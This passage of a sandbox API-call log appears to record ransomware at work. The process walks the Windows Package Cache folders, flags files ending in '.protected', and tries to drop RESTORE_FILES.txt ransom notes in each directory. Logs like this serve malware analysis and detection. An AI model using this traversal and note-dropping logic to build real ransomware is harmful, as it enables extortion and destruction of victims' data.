hFindFile=0x47ba10) returned 1 [0093.352] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.352] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.352] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.352] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.352] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.352] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.352] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.352] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.353] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned 87 [0093.353] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2=".") returned 1 [0093.353] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="..") returned 1 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*") returned 89 [0093.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\.") returned 89 [0093.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.354] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\..") returned 90 [0093.354] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.354] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned 96 [0093.354] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.354] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.354] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*") returned 98 [0093.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\.") returned 98 [0093.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\..") returned 99 [0093.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.355] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.355] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned 120 [0093.355] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0093.355] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*") returned 122 [0093.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\.") returned 122 [0093.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\..") returned 123 [0093.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 139 [0093.356] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.356] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 138 [0093.356] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.356] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.356] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 159 [0093.356] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.356] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.356] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 138 [0093.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.356] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.356] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.357] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.357] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.357] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.357] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.357] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.357] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.357] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.357] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.358] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.358] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned 87 [0093.358] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2=".") returned 1 [0093.358] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="..") returned 1 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*") returned 89 [0093.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\.") returned 89 [0093.358] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.358] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\..") returned 90 [0093.358] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.358] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned 96 [0093.358] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.359] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*") returned 98 [0093.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\.") returned 98 [0093.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.359] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\..") returned 99 [0093.359] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.359] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.359] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.359] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.359] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned 119 [0093.360] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0093.360] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*") returned 121 [0093.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\.") returned 121 [0093.360] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\..") returned 122 [0093.360] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 138 [0093.360] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 137 [0093.360] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.360] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 155 [0093.360] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.360] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 137 [0093.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.360] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.360] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.361] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.361] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.361] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.361] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.361] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.361] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.361] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.362] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.362] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.362] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 86 [0093.362] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2=".") returned 1 [0093.362] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="..") returned 1 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*") returned 88 [0093.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\.") returned 88 [0093.363] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.363] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\..") returned 89 [0093.363] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.363] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.363] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned 95 [0093.363] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.363] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.363] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*") returned 97 [0093.363] FindFirstFileW 